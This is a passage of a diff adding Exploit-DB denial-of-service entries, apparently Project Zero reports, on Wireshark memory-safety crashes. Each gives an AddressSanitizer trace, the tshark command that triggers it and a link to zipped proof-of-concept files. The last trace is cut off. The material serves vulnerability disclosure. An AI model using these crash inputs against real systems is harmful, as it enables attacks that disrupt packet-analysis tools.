+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==28048==ABORTING
+--- cut ---
+
+The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554129. Attached are two PDF files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39322.zip
+
--- a/platforms/multiple/dos/39323.txt
+++ b/platforms/multiple/dos/39323.txt
@ -0,0 +1,65 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=697
+
+The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==25088==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffdbb9f36e at pc 0x7f26c4ae2af4 bp 0x7fffdbb9f190 sp 0x7fffdbb9f188
+READ of size 1 at 0x7fffdbb9f36e thread T0
+    #0 0x7f26c4ae2af3 in ascii_strup_inplace wireshark/wsutil/str_util.c:71:16
+    #1 0x7f26d8893b1c in iseries_check_file_type wireshark/wiretap/iseries.c:336:9
+    #2 0x7f26d8892a63 in iseries_open wireshark/wiretap/iseries.c:231:14
+    #3 0x7f26d8864c51 in wtap_open_offline wireshark/wiretap/file_access.c:1042:13
+    #4 0x51dd9d in cf_open wireshark/tshark.c:4195:9
+    #5 0x5178cb in main wireshark/tshark.c:2188:9
+
+Address 0x7fffdbb9f36e is located in stack of thread T0 at offset 302 in frame
+    #0 0x7f26d88934bf in iseries_check_file_type wireshark/wiretap/iseries.c:306
+
+  This frame has 2 object(s):
+    [32, 302) 'buf' <== Memory access at offset 302 overflows this variable
+    [368, 377) 'protocol'
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
+      (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: stack-buffer-overflow wireshark/wsutil/str_util.c:71:16 in ascii_strup_inplace
+Shadow bytes around the buggy address:
+  0x10007b76be10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007b76be20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007b76be30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007b76be40: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
+  0x10007b76be50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x10007b76be60: 00 00 00 00 00 00 00 00 00 00 00 00 00[06]f2 f2
+  0x10007b76be70: f2 f2 f2 f2 f2 f2 00 01 f3 f3 f3 f3 00 00 00 00
+  0x10007b76be80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007b76be90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10007b76bea0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
+  0x10007b76beb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==25088==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11985. Attached is a file which triggers the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39323.zip
+
--- a/platforms/multiple/dos/39324.txt
+++ b/platforms/multiple/dos/39324.txt
@ -0,0 +1,113 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=696
+
+The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==24710==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe68161a6c at pc 0x0000004ab766 bp 0x7ffe681503f0 sp 0x7ffe6814fba0
+WRITE of size 120 at 0x7ffe68161a6c thread T0
+    #0 0x4ab765 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
+    #1 0x7ff89a5f89ec in tvb_memcpy wireshark/epan/tvbuff.c:783:10
+    #2 0x7ff89b7ba95c in dissect_nhdr_extopt wireshark/epan/dissectors/packet-lbmc.c:10013:13
+    #3 0x7ff89b7a1a54 in lbmc_dissect_lbmc_packet wireshark/epan/dissectors/packet-lbmc.c:11039:41
+    #4 0x7ff89b82ece9 in dissect_lbttcp_pdu wireshark/epan/dissectors/packet-lbttcp.c:620:21
+    #5 0x7ff89c4a5254 in tcp_dissect_pdus wireshark/epan/dissectors/packet-tcp.c:2762:13
+    #6 0x7ff89b82c7dc in dissect_lbttcp_real wireshark/epan/dissectors/packet-lbttcp.c:642:5
+    #7 0x7ff89b82ad4e in test_lbttcp_packet wireshark/epan/dissectors/packet-lbttcp.c:698:5
+    #8 0x7ff89a4b1c57 in dissector_try_heuristic wireshark/epan/packet.c:2332:7
+    #9 0x7ff89c4a6de0 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4644:13
+    #10 0x7ff89c4ac5e3 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4690:13
+    #11 0x7ff89c4a765b in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4771:9
+    #12 0x7ff89c4bc7f0 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5623:13
+    #13 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
+    #14 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9
+    #15 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
+    #16 0x7ff89b5f0e0b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1976:7
+    #17 0x7ff89b5fba21 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2468:10
+    #18 0x7ff89b5f1569 in dissect_ip wireshark/epan/dissectors/packet-ip.c:2491:5
+    #19 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
+    #20 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9
+    #21 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
+    #22 0x7ff89a4aa1a4 in dissector_try_uint wireshark/epan/packet.c:1177:9
+    #23 0x7ff89bdd7830 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:4346:10
+    #24 0x7ff89bdd6fec in dissect_ppp_hdlc_common wireshark/epan/dissectors/packet-ppp.c:5339:5
+    #25 0x7ff89bdcf2a5 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:5380:5
+    #26 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
+    #27 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9
+    #28 0x7ff89a4a95fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
+    #29 0x7ff89b1e60d3 in dissect_frame wireshark/epan/dissectors/packet-frame.c:491:11
+    #30 0x7ff89a4b74a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
+    #31 0x7ff89a4a9e2a in call_dissector_work wireshark/epan/packet.c:694:9
+    #32 0x7ff89a4b396e in call_dissector_only wireshark/epan/packet.c:2665:8
+    #33 0x7ff89a4a53df in call_dissector_with_data wireshark/epan/packet.c:2678:8
+    #34 0x7ff89a4a4a2b in dissect_record wireshark/epan/packet.c:502:3
+    #35 0x7ff89a4559b9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
+    #36 0x52856b in process_packet wireshark/tshark.c:3728:5
+    #37 0x5219e0 in load_cap_file wireshark/tshark.c:3484:11
+    #38 0x517e2c in main wireshark/tshark.c:2197:13
+
+Address 0x7ffe68161a6c is located in stack of thread T0 at offset 65644 in frame
+    #0 0x7ff89b79d1ff in lbmc_dissect_lbmc_packet wireshark/epan/dissectors/packet-lbmc.c:10597
+
+  This frame has 17 object(s):
+    [32, 36) 'bhdr'
+    [48, 52) 'msgprop_len'
+    [64, 80) 'frag_info'
+    [96, 65644) 'reassembly' <== Memory access at offset 65644 overflows this variable
+    [65904, 65908) 'data_is_umq_cmd_resp'
+    [65920, 65940) 'stream_info'
+    [65984, 65996) 'ctxinstd_info'
+    [66016, 66028) 'ctxinstr_info'
+    [66048, 66120) 'destination_info'
+    [66160, 66416) 'found_header'
+    [66480, 66584) 'uim_stream_info'
+    [66624, 66632) 'tcp_sid_info'
+    [66656, 66672) 'tcp_addr'
+    [66688, 66692) 'tcp_session_id'
+    [66704, 66712) 'hdtbl_entry'
+    [66736, 66740) 'encoding'
+    [66752, 66756) 'pdmlen'
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
+      (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
+Shadow bytes around the buggy address:
+  0x10004d0242f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10004d024300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10004d024310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10004d024320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x10004d024330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x10004d024340: 00 00 00 00 00 00 00 00 00 00 00 00 00[04]f2 f2
+  0x10004d024350: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
+  0x10004d024360: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 04 f2
+  0x10004d024370: 00 00 04 f2 f2 f2 f2 f2 00 04 f2 f2 00 04 f2 f2
+  0x10004d024380: 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00
+  0x10004d024390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==24710==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11984. Attached are two files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39324.zip
+
--- a/platforms/multiple/dos/39325.txt
+++ b/platforms/multiple/dos/39325.txt
@ -0,0 +1,89 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=695
+
+The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==24377==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f7a3ce4efe0 at pc 0x7f7a39a5a121 bp 0x7ffe1fcb92e0 sp 0x7ffe1fcb92d8
+READ of size 4 at 0x7f7a3ce4efe0 thread T0
+    #0 0x7f7a39a5a120 in hiqnet_display_data wireshark/epan/dissectors/packet-hiqnet.c:523:15
+    #1 0x7f7a39a59354 in dissect_hiqnet_pdu wireshark/epan/dissectors/packet-hiqnet.c:906:34
+    #2 0x7f7a39a560b7 in dissect_hiqnet_udp wireshark/epan/dissectors/packet-hiqnet.c:1031:9
+    #3 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
+    #4 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
+    #5 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
+    #6 0x7f7a38aa41a4 in dissector_try_uint wireshark/epan/packet.c:1177:9
+    #7 0x7f7a3abc065d in decode_udp_ports wireshark/epan/dissectors/packet-udp.c:536:7
+    #8 0x7f7a3abce912 in dissect wireshark/epan/dissectors/packet-udp.c:1031:5
+    #9 0x7f7a3abc31a0 in dissect_udplite wireshark/epan/dissectors/packet-udp.c:1044:3
+    #10 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
+    #11 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
+    #12 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
+    #13 0x7f7a39beae0b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:1976:7
+    #14 0x7f7a39bf5a21 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2468:10
+    #15 0x7f7a39beb569 in dissect_ip wireshark/epan/dissectors/packet-ip.c:2491:5
+    #16 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
+    #17 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
+    #18 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
+    #19 0x7f7a38aa41a4 in dissector_try_uint wireshark/epan/packet.c:1177:9
+    #20 0x7f7a3a3d1830 in dissect_ppp_common wireshark/epan/dissectors/packet-ppp.c:4346:10
+    #21 0x7f7a3a3d0fec in dissect_ppp_hdlc_common wireshark/epan/dissectors/packet-ppp.c:5339:5
+    #22 0x7f7a3a3c92a5 in dissect_ppp_hdlc wireshark/epan/dissectors/packet-ppp.c:5380:5
+    #23 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
+    #24 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
+    #25 0x7f7a38aa35fd in dissector_try_uint_new wireshark/epan/packet.c:1151:9
+    #26 0x7f7a397e00d3 in dissect_frame wireshark/epan/dissectors/packet-frame.c:491:11
+    #27 0x7f7a38ab14a1 in call_dissector_through_handle wireshark/epan/packet.c:619:8
+    #28 0x7f7a38aa3e2a in call_dissector_work wireshark/epan/packet.c:694:9
+    #29 0x7f7a38aad96e in call_dissector_only wireshark/epan/packet.c:2665:8
+    #30 0x7f7a38a9f3df in call_dissector_with_data wireshark/epan/packet.c:2678:8
+    #31 0x7f7a38a9ea2b in dissect_record wireshark/epan/packet.c:502:3
+    #32 0x7f7a38a4f9b9 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2
+    #33 0x52856b in process_packet wireshark/tshark.c:3728:5
+    #34 0x5219e0 in load_cap_file wireshark/tshark.c:3484:11
+    #35 0x517e2c in main wireshark/tshark.c:2197:13
+
+0x7f7a3ce4efe0 is located 32 bytes to the left of global variable '' defined in 'packet-hiqnet.c' (0x7f7a3ce4f000) of size 16
+  '' is ascii string 'packet-hiqnet.c'
+0x7f7a3ce4efe0 is located 16 bytes to the right of global variable 'hiqnet_datasize_per_type' defined in 'packet-hiqnet.c:282:19' (0x7f7a3ce4efa0) of size 48
+SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-hiqnet.c:523:15 in hiqnet_display_data
+Shadow bytes around the buggy address:
+  0x0fefc79c1da0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9
+  0x0fefc79c1db0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 05 f9 f9
+  0x0fefc79c1dc0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 00 f9 f9
+  0x0fefc79c1dd0: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
+  0x0fefc79c1de0: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 04 f9 f9
+=>0x0fefc79c1df0: f9 f9 f9 f9 00 00 00 00 00 00 f9 f9[f9]f9 f9 f9
+  0x0fefc79c1e00: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
+  0x0fefc79c1e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0fefc79c1e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0fefc79c1e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0fefc79c1e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11983. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39325.zip
+
--- a/platforms/multiple/dos/39326.txt
+++ b/platforms/multiple/dos/39326.txt
@ -0,0 +1,64 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=694
+
+The following crash due to a stack-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==23220==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffc04c9c20 at pc 0x00000046cc29 bp 0x7fffc04c99b0 sp 0x7fffc04c9160
+READ of size 515 at 0x7fffc04c9c20 thread T0
+    #0 0x46cc28 in StrstrCheck(void*, char*, char const*, char const*) llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:314
+    #1 0x46d0f7 in __interceptor_strstr llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:328
+    #2 0x7fbfa4361585 in nettrace_3gpp_32_423_file_open wireshark/wiretap/nettrace_3gpp_32_423.c:986:13
+    #3 0x7fbfa429fc7c in wtap_open_offline wireshark/wiretap/file_access.c:913:11
+    #4 0x51dd9d in cf_open wireshark/tshark.c:4195:9
+    #5 0x5178cb in main wireshark/tshark.c:2188:9
+
+Address 0x7fffc04c9c20 is located in stack of thread T0 at offset 544 in frame
+    #0 0x7fbfa43611ff in nettrace_3gpp_32_423_file_open wireshark/wiretap/nettrace_3gpp_32_423.c:964
+
+  This frame has 1 object(s):
+    [32, 544) 'magic_buf' <== Memory access at offset 544 overflows this variable
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
+      (longjmp and C++ exceptions *are* supported)
+SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:314 in StrstrCheck(void*, char*, char const*, char const*)
+Shadow bytes around the buggy address:
+  0x100078091330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x100078091340: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
+  0x100078091350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x100078091360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x100078091370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x100078091380: 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3 00 00 00 00
+  0x100078091390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000780913a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000780913b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000780913c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x1000780913d0: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==23220==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11982. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39326.zip
+
--- a/platforms/multiple/dos/39327.txt
+++ b/platforms/multiple/dos/39327.txt
@ -0,0 +1,133 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=659
+
+The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==6953==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fdbb5647800 at pc 0x7fdd101b5365 bp 0x7ffee2b92610 sp 0x7ffee2b92608
+READ of size 1 at 0x7fdbb5647800 thread T0
+    #0 0x7fdd101b5364 in dissect_ber_constrained_bitstring wireshark/epan/dissectors/packet-ber.c:3990:17
+    #1 0x7fdd101b5a56 in dissect_ber_bitstring wireshark/epan/dissectors/packet-ber.c:4016:10
+    #2 0x7fdd1277c345 in dissect_ns_cert_exts_CertType wireshark/epan/dissectors/../../asn1/ns_cert_exts/packet-ns_cert_exts-fn.c:93:12
+    #3 0x7fdd1277b3fe in dissect_CertType_PDU wireshark/epan/dissectors/../../asn1/ns_cert_exts/packet-ns_cert_exts-fn.c:155:12
+    #4 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+    #5 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
+    #6 0x7fdd0fcba02d in dissector_try_string wireshark/epan/packet.c:1443:9
+    #7 0x7fdd1019276b in call_ber_oid_callback wireshark/epan/dissectors/packet-ber.c:1096:17
+    #8 0x7fdd12bd0192 in dissect_x509af_T_extnValue wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:138:10
+    #9 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
+    #10 0x7fdd12bcd47d in dissect_x509af_Extension wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:155:12
+    #11 0x7fdd101ae695 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
+    #12 0x7fdd101aea3b in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
+    #13 0x7fdd12bcd52d in dissect_x509af_Extensions wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:168:12
+    #14 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
+    #15 0x7fdd12bd02af in dissect_x509af_T_signedCertificate wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:191:12
+    #16 0x7fdd101a1d4a in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
+    #17 0x7fdd12bcd5dd in dissect_x509af_Certificate wireshark/epan/dissectors/../../asn1/x509af/x509af.cnf:218:12
+    #18 0x7fdd11c08b83 in ssl_dissect_hnd_cert wireshark/epan/dissectors/packet-ssl-utils.c:5958:21
+    #19 0x7fdd11c21752 in dissect_ssl3_handshake wireshark/epan/dissectors/packet-ssl.c:1930:17
+    #20 0x7fdd11c1a71b in dissect_ssl3_record wireshark/epan/dissectors/packet-ssl.c:1619:13
+    #21 0x7fdd11c14e12 in dissect_ssl wireshark/epan/dissectors/packet-ssl.c:723:26
+    #22 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+    #23 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
+    #24 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+    #25 0x7fdd11c697d0 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4610:9
+    #26 0x7fdd11c6f043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
+    #27 0x7fdd11c6bbed in desegment_tcp wireshark/epan/dissectors/packet-tcp.c:2260:9
+    #28 0x7fdd11c6a24e in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4735:9
+    #29 0x7fdd11c7f7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
+    #30 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+    #31 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
+    #32 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+    #33 0x7fdd10dc588b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
+    #34 0x7fdd10dd02b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
+    #35 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+    #36 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
+    #37 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+    #38 0x7fdd0fcb8964 in dissector_try_uint wireshark/epan/packet.c:1174:9
+    #39 0x7fdd108d748d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
+    #40 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+    #41 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
+    #42 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8
+    #43 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+    #44 0x7fdd108d3725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
+    #45 0x7fdd108cbf33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
+    #46 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+    #47 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
+    #48 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+    #49 0x7fdd109c75f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+    #50 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+    #51 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
+    #52 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8
+    #53 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+    #54 0x7fdd0fcb333b in dissect_record wireshark/epan/packet.c:501:3
+    #55 0x7fdd0fc613c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
+    #56 0x5264eb in process_packet wireshark/tshark.c:3728:5
+    #57 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
+    #58 0x515daf in main wireshark/tshark.c:2197:13
+
+0x7fdbb5647800 is located 0 bytes to the right of 2097152-byte region [0x7fdbb5447800,0x7fdbb5647800)
+allocated by thread T0 here:
+    #0 0x4c0bc8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
+    #1 0x7fdd081e9610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
+    #2 0x7fdd131b731d in wmem_block_fast_alloc wireshark/epan/wmem/wmem_allocator_block_fast.c:126:9
+    #3 0x7fdd0fc0f4ca in address_to_str wireshark/epan/address_types.c:909:18
+    #4 0x7fdd0fc109b0 in address_with_resolution_to_str wireshark/epan/address_types.c:1054:16
+    #5 0x7fdd108d16c5 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:494:17
+    #6 0x7fdd108cbf33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
+    #7 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+    #8 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
+    #9 0x7fdd0fcb7dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
+    #10 0x7fdd109c75f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
+    #11 0x7fdd0fcc5cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
+    #12 0x7fdd0fcb85ea in call_dissector_work wireshark/epan/packet.c:691:9
+    #13 0x7fdd0fcc22be in call_dissector_only wireshark/epan/packet.c:2662:8
+    #14 0x7fdd0fcb3ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
+    #15 0x7fdd0fcb333b in dissect_record wireshark/epan/packet.c:501:3
